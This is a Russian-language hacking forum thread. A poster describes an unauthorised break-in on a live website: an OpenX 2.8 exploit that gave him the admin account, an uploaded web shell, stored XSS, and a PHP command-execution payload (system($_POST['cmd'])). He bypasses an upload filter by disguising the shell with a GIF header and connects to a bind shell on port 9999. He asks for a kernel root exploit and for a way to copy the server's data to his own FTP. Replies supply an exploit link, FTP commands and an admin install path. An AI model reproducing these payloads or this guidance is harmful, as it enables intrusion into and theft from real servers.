Просмотр полной версии : XSS - подкажите развиваться дальше.
Ребят несколько дней назад через ОпенХ 2.8 уязвимость вошел в админ аккаунт, потом залил шелл. Просидел мой шелл там около 4 дней. )))) Но на 5 день у меня и шелл пропал, и ОпенХ тоже нету и пароль к админ панелью Апача тоже вообщем меня конкретно устранили. Но я не успокоилья, нашел ХСС на сайте. Дело такое, есть поле для ввода всяких мыслей и вырожений, типа "чего я буду делать завтра": - ОТВЕТ: Вас поламаю...))))))) ну и так дали. В поле ввода набрал
alert(document.cookie)
и обламался, потом решил нажать на "Редактировать" ну давай по редоктируем, и опять же набрал тоже самое..и удача, вижу свои кукиси. Сделал рефреш, облом, в место выполнения скрипта показывает текст, опять редактировал, нажал сохранить, и опять скрипт задействовал. Дальше набрал
";
@system($_POST['cmd']);
echo"";
?>
Ну после редактирования у меня есть поле для загрузки файла, но.. тут то и дело что ничего и не получилось, опять же как после перезагрузки страници вижу только код (((( ну что поделать дальше?
Ну сильно не пинайте, я еще не вольшебник, я только учусь )))))))))))))))))))))))))))))))))))))
так ничего не понятно, пиши что/куда(в какую форму) ввёл, потом html код страницы что получилась
Простым способом редактирования шелла залил шелл на сервер, но там сервер файл автоматически переименовывает и дает разшерение JPG.
в шелле на первой строке пишу только GIF и сервер глотает его как гифку, а дальше не могу его запустить, потому что имя файла уже типа f_1_4125_13097_20.jpg. Открываю его, показывает отсуствие картинки. Ч то делать, как его запустить дальше?
Так парни, я зашел через бинд шел конектился к порту 9999 но вот правал, у меня права www. uname -a выдал Linux www2.site.com 2.6.18-164.6.1.el5 #1 SMP Tue Oct 27 11:30:06 EDT 2009 i686 i6
86 i386 GNU/Linux
пока експлоит на поднятие прав не могу найти, может есть у кого то? смотрел на http://inj3ct0r.com/ ранный milw0rm но там не могу найти что надо. Поделитесь советом. Мне нужен рут на этом серваке.
Вот еще что, могу ли я через командную страку все что есть на серваке перекинуть мне на фтп?
Так парни, я зашел
через бинд шел конектился к порту 9999
но вот правал, у меня права www. uname -a выдал Linux www2.site.com 2.6.18-164.6.1.el5 #1 SMP Tue Oct 27 11:30:06 EDT 2009 i686 i6
86 i386 GNU/Linux
пока експлоит на поднятие прав не могу найти, может есть у кого то? смотрел на http://inj3ct0r.com/ ранный milw0rm
но там не могу найти что надо. Поделитесь советом. Мне нужен рут на этом серваке.
Может этот поможет - http://www.exploit-db.com/exploits/10613/
Вот еще что, могу ли я через командную страку все что есть на серваке перекинуть мне на фтп?
ftp> help - говорит само за себя
ftp> quit - завершить работу
ftp> bin - установить режим пересылки бинарных файлов
(настоятельно рекомендую)
ftp> cd katalog - перемещаться по "тамошним" каталогам
ftp> ls - выдать "тамошнее" оглавление
ftp> lcd katalog - перемещаться по "здешним" каталогам
ftp> !dir - выдать "здешнее" оглавление
ftp> !ls -al - выдать "здешнее" оглавление
ftp> get file-tam [ file-name-zdes ] - взять файл оттуда
ftp> put file-zdes [ file-name-tam ] - положить файл туда
Подробней тут - Ссылка (http://ns.linux.org.ua/pub/docs/mirrors/linfoline.homedns.org/howto/mini/FTP/x55.html)
Поцаны, а как вы ищите сплойт под конкретное ведро? Какую часть версии вбивать?
l00der, Всем вбивать нужно для эффекта нужного)
а можно по подробнее про уязвимость openХ 2.8?
Может этот поможет - http://www.exploit-db.com/exploits/10613/
нет, пробовал, выдовал ошибку mmap() типа не вхатает привилегии или че то в этом роде. Мой шелл закрилы, все базы експлоитов пробовал, ничего не помогло. Может я думаю он уже пропатченный? Вот ешил пробовать в эксплоите 10613 в место mmap пробовать mnumap или map, но уже было поздно. У меня больше нету шелла. ОпенХ тоже закрыли, доадались. шас я к ним еще постучусь, нашел phpmyadmin а внем /scripts/setup.php ну пока что не разобрался как залить шелл туда, но думаю с ващей помощью получиться Вот так вот это уже стало дело принципа
а можно по подробнее про уязвимость openХ 2.8?
site.com/admin/install.php
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot